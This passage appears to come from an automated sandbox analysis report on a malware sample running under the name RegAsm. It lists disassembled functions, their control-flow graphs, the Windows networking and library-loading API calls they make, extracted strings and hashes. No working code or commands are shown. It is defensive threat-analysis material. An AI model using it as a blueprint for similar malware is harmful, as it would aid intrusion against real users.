                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Cursor$Sleep$__aulldiv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1481957275-0
                                                                                                                                                                                                                                  • Opcode ID: 4366ffaee9367ffea03055b95ab056999a8278ba8b74c1802e438da7f2f8d238
                                                                                                                                                                                                                                  • Instruction ID: 670f10937d811d812307df241510028ea0fda929e8b4377b911cd561125e0c45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4366ffaee9367ffea03055b95ab056999a8278ba8b74c1802e438da7f2f8d238
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F1C574E042189FDB14CF98D890BAEBBB2FF89304F14819AE819A7345D734AA85CF55
                                                                                                                                                                                                                                  Function 0050CCE0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 135memorystringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 6460 50cce0-50cd26 call 50c690 call 50c650 6465 50cd32-50cd56 call 41b910 6460->6465 6466 50cd28-50cd2d 6460->6466 6470 50cd59-50cd69 6465->6470 6467 50ce97-50ce9a 6466->6467 6470->6470 6471 50cd6b-50cd92 call 41a1e0 6470->6471 6474 50cdc0-50cdc5 call 41bb40 6471->6474 6475 50cd94-50cd98 6471->6475 6480 50cdca-50cdce 6474->6480 6476 50cda3 6475->6476 6477 50cd9a-50cda1 6475->6477 6479 50cdaa-50cdb0 6476->6479 6477->6479 6479->6474 6481 50cdb2-50cdbe call 414e70 6479->6481 6482 50cdd0-50cdd7 6480->6482 6483 50cdd9 6480->6483 6481->6480 6485 50cde0-50cde6 6482->6485 6483->6485 6487 50cde8-50cdff call 4ef210 6485->6487 6488 50ce2e-50ce3a call 417140 6485->6488 6493 50ce02-50ce12 6487->6493 6494 50ce3c-50ce4c lstrlenA 6488->6494 6495 50ce4e-50ce57 6488->6495 6493->6493 6496 50ce14-50ce29 call 4172e0 6493->6496 6497 50ce5a-50ce95 GetProcessHeap HeapAlloc lstrcpynA 6494->6497 6495->6497 6496->6488 6497->6467
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,aaj38,?), ref: 0050CE40
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000001,00000000,aaj38,?), ref: 0050CE63
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0050CE6A
                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 0050CE7F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocProcesslstrcpynlstrlen
                                                                                                                                                                                                                                  • String ID: 38a49$aaj38
                                                                                                                                                                                                                                  • API String ID: 2211197272-4103302207
                                                                                                                                                                                                                                  • Opcode ID: 448a550449d46fdc8ba7afc04d09575f33fbd3f77e041197c805c10ca7feb4f5
                                                                                                                                                                                                                                  • Instruction ID: 08bbaa513fa62d9cccc12bc81a3fcce503bc0ea032a3d737ebf7e79e91738d23
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 448a550449d46fdc8ba7afc04d09575f33fbd3f77e041197c805c10ca7feb4f5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 435103B1D04248AFCF04DFE4D898BEEBFB1BF49304F108169E506AB281C7755A85CB94
                                                                                                                                                                                                                                  Function 0042C670 Relevance: 7.8, APIs: 5, Instructions: 265COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 6541 42c670-42c680 6542 42c682-42c68e 6541->6542 6543 42c6ae-42c6b0 6541->6543 6544 42c691-42c6a1 6542->6544 6545 42c999-42c99f 6543->6545 6544->6544 6546 42c6a3-42c6ac 6544->6546 6546->6543 6547 42c6b5-42c6cc GetFileAttributesA 6546->6547 6548 42c6d2-42c768 GetLastError call 5672b0 * 3 call 567190 call 41fbd0 6547->6548 6549 42c997 6547->6549 6560 42c776-42c837 call 5672b0 call 567190 6548->6560 6561 42c76a-42c770 6548->6561 6549->6545 6567 42c845-42c8cd call 5672b0 * 2 call 41fb00 6560->6567 6568 42c839-42c83f 6560->6568 6561->6560 6562 42c98d-42c98f 6561->6562 6562->6545 6575 42c8de-42c97d call 5672b0 * 3 call 567190 call 41fbd0 6567->6575 6576 42c8cf-42c8d8 6567->6576 6568->6562 6568->6567 6587 42c993-42c995 6575->6587 6588 42c97f-42c98b 6575->6588 6576->6562 6576->6575 6587->6545 6588->6562 6588->6587
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv$AttributesErrorFileLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3597693367-0
                                                                                                                                                                                                                                  • Opcode ID: 1083ba72d6f9da74ff1a1281b331befb0be83b02e0f84e54cb495f8206f5af21
                                                                                                                                                                                                                                  • Instruction ID: 45c6bf80a9a4236fa5f333371ff9548f82703451e4799d120c0b858235f38910
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1083ba72d6f9da74ff1a1281b331befb0be83b02e0f84e54cb495f8206f5af21
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6A16FB1E04218AFEB24CFA4DC81B9EBBB5BB88714F118169E908B7384D7386D41CF55
                                                                                                                                                                                                                                  Function 0050CA00 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 218networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0050C6E0: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050C734
                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,00000002,00000000,00000000,80000000,00000000), ref: 0050CB13
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0050CCA7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$Open$CloseHandle
                                                                                                                                                                                                                                  • String ID: {
                                                                                                                                                                                                                                  • API String ID: 3289985339-366298937
                                                                                                                                                                                                                                  • Opcode ID: 72c89d0deed0a441a999497de95daab5c3724120d9b3ae71b9a47c57a93df974
                                                                                                                                                                                                                                  • Instruction ID: 4ce0df4eb4c6b84b648c5da0d1d41232108de021786f986a04df3d20874892ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72c89d0deed0a441a999497de95daab5c3724120d9b3ae71b9a47c57a93df974
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8A1E1B0D00209DFDB04CFA8C895BEEBFB5BF49304F248659E515AB281D774AA45CFA4
                                                                                                                                                                                                                                  Function 00427210 Relevance: 7.2, APIs: 2, Strings: 1, Instructions: 1923libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00424730: __aulldiv.LIBCMT ref: 00424AC6
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042902A
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004291CF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$__aulldiv
                                                                                                                                                                                                                                  • String ID: Ju||i
                                                                                                                                                                                                                                  • API String ID: 898380398-1653578089
                                                                                                                                                                                                                                  • Opcode ID: 8745cb1ceed82f05b992489eba330a7df14f11b7e072391ca8ee3f29851edf64
                                                                                                                                                                                                                                  • Instruction ID: 01edd34a2ff59f6ba276b9c765401dc00774b313d148437bcfa790f6f3787f76
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8745cb1ceed82f05b992489eba330a7df14f11b7e072391ca8ee3f29851edf64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A232870E052688FDB25CF68DC90BEEBBB1BF4A308F1481DAD449AB342D6355A85CF54
                                                                                                                                                                                                                                  Function 00434B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                  • API String ID: 3732870572-2811858139
                                                                                                                                                                                                                                  • Opcode ID: 18d5b9beba2140ea9d8a79387bcaeb54fcf25cb39f1b9adfa145700a3c69558f
                                                                                                                                                                                                                                  • Instruction ID: 9ac544591481852ff1f24b66d42fc835acbe24e5fb17347bccd30f052ea243d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d5b9beba2140ea9d8a79387bcaeb54fcf25cb39f1b9adfa145700a3c69558f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF613AB1E00208ABDB14DFA9DC55BEEBBB5FF88304F108129E509BB380DB346945CB95
                                                                                                                                                                                                                                  Function 0051CBD0 Relevance: 4.6, APIs: 3, Instructions: 140COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0051CC5E
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0051CC9F
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000,00000001,00000028,?,00000000,00000001,00000008), ref: 0051CD44
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$HandleModule
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1090667551-0
                                                                                                                                                                                                                                  • Opcode ID: bb15006e30f6fc4ad114c43c02281f78c9b151033810da23866ffd457616cdb5
                                                                                                                                                                                                                                  • Instruction ID: 97641b7349625e1fc39116a3fc008556c34bd63661c16a7afda32eddf8c500ec
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb15006e30f6fc4ad114c43c02281f78c9b151033810da23866ffd457616cdb5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5451FFB5E08288AFDF04DBF99C45AEEBFF56F49200F0484AEF555E7282E53846048B61
                                                                                                                                                                                                                                  Function 0051CE70 Relevance: 3.2, APIs: 2, Instructions: 150COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(000005B6), ref: 0051CF1F
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0051CFFE
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                    • Part of subcall function 0051CBD0: GetModuleHandleA.KERNEL32(00000000), ref: 0051CC5E
                                                                                                                                                                                                                                    • Part of subcall function 0051CBD0: GetLastError.KERNEL32 ref: 0051CC9F
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                    • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireErrorHandleLastModuleRelease$ConditionVariableWake
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1192564941-0
                                                                                                                                                                                                                                  • Opcode ID: 3c61142d6a529783f9a7f44b10c1c23837b253fa439514407c0f05a29478219e
                                                                                                                                                                                                                                  • Instruction ID: da503e9b5a87a20e2105babc717d57e8608aa471fe1d2307e044f11a65867f3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c61142d6a529783f9a7f44b10c1c23837b253fa439514407c0f05a29478219e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA51D1B5D04259AFDB04EBF8D845AEFBFB5BB58300F04416AF456A3282EA345A04CB71
                                                                                                                                                                                                                                  Function 0053EE6E Relevance: 1.7, APIs: 1, Instructions: 185COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0053F4A9
                                                                                                                                                                                                                                    • Part of subcall function 005419D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,0053F492,?,?,?,?,0053F492,?,00589EB8), ref: 00541A31
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFeaturePresentProcessorRaise
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1477838251-0
                                                                                                                                                                                                                                  • Opcode ID: e1731ebaf9c9286b43d05d9ca5bf63736d23aafcd07e72bce60f484c2a9b04f9
                                                                                                                                                                                                                                  • Instruction ID: b756088b79cdc6fcb9611e60ec5426cb90f3622610dc80278f53a7cb6555a18f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1731ebaf9c9286b43d05d9ca5bf63736d23aafcd07e72bce60f484c2a9b04f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C616E71D01709DBEB14CFA8E8867AABBF8FB58310F24853AD815E72A1D3749948DB50
                                                                                                                                                                                                                                  Function 0050C6E0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 255networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 5920 50c6e0-50c73e InternetOpenA 5921 50c740-50c745 5920->5921 5922 50c74a-50c792 5920->5922 5923 50c9ed-50c9f3 5921->5923 5926 50c794-50c7b4 5922->5926 5927 50c7b7-50c7e9 5922->5927 5926->5927 5928 50c7f4-50c7f8 5927->5928 5929 50c825-50c878 HttpOpenRequestA HttpSendRequestA 5928->5929 5930 50c7fa-50c823 5928->5930 5932 50c978-50c9a0 5929->5932 5933 50c87e-50c91b GetLastError call 5672b0 * 3 call 567190 call 50c580 5929->5933 5930->5928 5938 50c9a2 5932->5938 5939 50c9a9-50c9ad 5932->5939 5933->5932 5953 50c91d-50c923 5933->5953 5938->5939 5941 50c9bf-50c9c3 5939->5941 5942 50c9af-50c9bc InternetCloseHandle 5939->5942 5944 50c9d5-50c9d9 5941->5944 5945 50c9c5-50c9d1 5941->5945 5942->5941 5946 50c9ea 5944->5946 5947 50c9db-50c9e6 5944->5947 5945->5944 5946->5923 5947->5946 5953->5932 5954 50c925-50c92b 5953->5954 5954->5932 5955 50c92d-50c974 5954->5955 5955->5932
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000,?,?), ref: 0050C734
                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0050C858
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Open$HttpInternetRequest
                                                                                                                                                                                                                                  • String ID: 6~swr
                                                                                                                                                                                                                                  • API String ID: 3438448461-3949020348
                                                                                                                                                                                                                                  • Opcode ID: a88b0c43ac1a490c4bf373b180905e63d4eef659a6c38b8be00db8ed448ef9b6
                                                                                                                                                                                                                                  • Instruction ID: 70100715baefbb30c352a620779e01e1d808f730c1b61b37c7f171706527f41a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a88b0c43ac1a490c4bf373b180905e63d4eef659a6c38b8be00db8ed448ef9b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FB1F6B4E00208EFEB14CFA4C895BEEBBB5FB49304F108559E505AB281D779AA05CF94
                                                                                                                                                                                                                                  Function 005584D2 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 6352 5584d2-5584e2 6353 5584e4-5584f7 call 54ef5e call 54ef71 6352->6353 6354 5584fc-5584fe 6352->6354 6370 558856 6353->6370 6356 558504-55850a 6354->6356 6357 55883e-55884b call 54ef5e call 54ef71 6354->6357 6356->6357 6360 558510-558539 6356->6360 6375 558851 call 553e8c 6357->6375 6360->6357 6363 55853f-558548 6360->6363 6366 558562-558564 6363->6366 6367 55854a-55855d call 54ef5e call 54ef71 6363->6367 6368 55883a-55883c 6366->6368 6369 55856a-55856e 6366->6369 6367->6375 6374 558859-55885c 6368->6374 6369->6368 6373 558574-558578 6369->6373 6370->6374 6373->6367 6377 55857a-558591 6373->6377 6375->6370 6381 5585c6-5585cc 6377->6381 6382 558593-558596 6377->6382 6383 5585a0-5585b7 call 54ef5e call 54ef71 call 553e8c 6381->6383 6384 5585ce-5585d5 6381->6384 6385 5585bc-5585c4 6382->6385 6386 558598-55859e 6382->6386 6418 558771 6383->6418 6387 5585d7 6384->6387 6388 5585d9-5585f7 call 55b45b call 55b421 * 2 6384->6388 6390 558639-558658 6385->6390 6386->6383 6386->6385 6387->6388 6422 558614-558637 call 54bd99 6388->6422 6423 5585f9-55860f call 54ef71 call 54ef5e 6388->6423 6391 558714-55871d call 562150 6390->6391 6392 55865e-55866a 6390->6392 6406 55871f-558731 6391->6406 6407 55878e 6391->6407 6392->6391 6395 558670-558672 6392->6395 6395->6391 6399 558678-558699 6395->6399 6399->6391 6403 55869b-5586b1 6399->6403 6403->6391 6408 5586b3-5586b5 6403->6408 6406->6407 6412 558733-558742 GetConsoleMode 6406->6412 6410 558792-5587a8 ReadFile 6407->6410 6408->6391 6414 5586b7-5586da 6408->6414 6416 558806-558811 GetLastError 6410->6416 6417 5587aa-5587b0 6410->6417 6412->6407 6413 558744-558748 6412->6413 6413->6410 6419 55874a-558762 ReadConsoleW 6413->6419 6414->6391 6421 5586dc-5586f2 6414->6421 6424 558813-558825 call 54ef71 call 54ef5e 6416->6424 6425 55882a-55882d 6416->6425 6417->6416 6426 5587b2 6417->6426 6420 558774-55877e call 55b421 6418->6420 6427 558764 GetLastError 6419->6427 6428 558783-55878c 6419->6428 6420->6374 6421->6391 6432 5586f4-5586f6 6421->6432 6422->6390 6423->6418 6424->6418 6429 558833-558835 6425->6429 6430 55876a-558770 call 54ef17 6425->6430 6436 5587b5-5587c7 6426->6436 6427->6430 6428->6436 6429->6420 6430->6418 6432->6391 6441 5586f8-55870f 6432->6441 6436->6420 6438 5587c9-5587cd 6436->6438 6445 5587e6-5587f3 6438->6445 6446 5587cf-5587df call 5581e4 6438->6446 6441->6391 6451 5587f5 call 55833b 6445->6451 6452 5587ff-558804 call 55802a 6445->6452 6457 5587e2-5587e4 6446->6457 6458 5587fa-5587fd 6451->6458 6452->6458 6457->6420 6458->6457
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5e435fbe6e5c3a679a91dfe9a823a3dad20eb66d7fc31304da5faf88fc3d29ed
                                                                                                                                                                                                                                  • Instruction ID: 262db4f49929ea17d8601a280de0a5c79875f4d3884bb4c56c2f73198716848e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e435fbe6e5c3a679a91dfe9a823a3dad20eb66d7fc31304da5faf88fc3d29ed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CB12274A00245AFDF10CFA8C8A5BBD7FB1FF59305F24414AE805AB292CB71994ACF60
                                                                                                                                                                                                                                  Function 00432B60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 6499 432b60-432b86 call 4150c0 call 432880 6504 432d3a 6499->6504 6505 432b8c-432bda call 414d00 call 416d40 6499->6505 6507 432d3c-432d3f 6504->6507 6511 432be2 6505->6511 6512 432bdc-432be0 6505->6512 6513 432be6-432bec 6511->6513 6512->6513 6514 432c26-432c34 call 4141f0 6513->6514 6515 432bee-432c21 call 414190 call 540290 6513->6515 6519 432c39-432c54 call 414120 6514->6519 6515->6507 6524 432c5a-432c6a 6519->6524 6525 432d0e-432d37 call 414190 call 540290 6519->6525 6524->6525 6526 432c70-432c7f 6524->6526 6525->6504 6528 432ca3-432cb3 6526->6528 6529 432c81-432c90 6526->6529 6533 432cb5-432cc5 6528->6533 6534 432cd9-432d0c call 414190 call 540290 6528->6534 6529->6528 6532 432c92-432ca1 6529->6532 6532->6525 6532->6528 6533->6534 6536 432cc7-432cd7 6533->6536 6534->6507 6536->6525 6536->6534
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00432880: __aulldiv.LIBCMT ref: 0043293C
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: std::ios_base::clear.LIBCPMTD ref: 00416E67
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432C16
                                                                                                                                                                                                                                    • Part of subcall function 004141F0: std::ios_base::clear.LIBCPMTD ref: 00414372
                                                                                                                                                                                                                                    • Part of subcall function 00414120: std::ios_base::clear.LIBCPMTD ref: 0041417E
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432D01
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00432D32
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_std::ios_base::clear$__aulldiv
                                                                                                                                                                                                                                  • String ID: `XA$`@
                                                                                                                                                                                                                                  • API String ID: 3845869555-3161672447
                                                                                                                                                                                                                                  • Opcode ID: 3be4e94092fbc97bf5c2871780405c665e384c0e12239df973384683e768a773
                                                                                                                                                                                                                                  • Instruction ID: f157f0d26c0302d6d38241ffe430d893d0c54141c1b3792623e3cbfa9e0c2486
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3be4e94092fbc97bf5c2871780405c665e384c0e12239df973384683e768a773
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2051E8B0A042484BDF04DFA4D5957FEBFB1AF46300F20506AD5056B391D7B99E80CB94
                                                                                                                                                                                                                                  Function 00432880 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID: D6&$eks$j3l6lrek
                                                                                                                                                                                                                                  • API String ID: 3732870572-3526828890
                                                                                                                                                                                                                                  • Opcode ID: 6f60af346a4d1eb37a1ab2123764005bdb36db85557dc665f9f7e21cfae2c4ea
                                                                                                                                                                                                                                  • Instruction ID: c84ca28e98123b79676576f89e03ed95eb2bf0e324ecca63c0ae73cc3441d6ca
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f60af346a4d1eb37a1ab2123764005bdb36db85557dc665f9f7e21cfae2c4ea
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EA113B0D042589FDB24DFA9C990BEEBBB1BF48304F1081AAD409BB341DB746A85CF55
                                                                                                                                                                                                                                  Function 0050CEC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
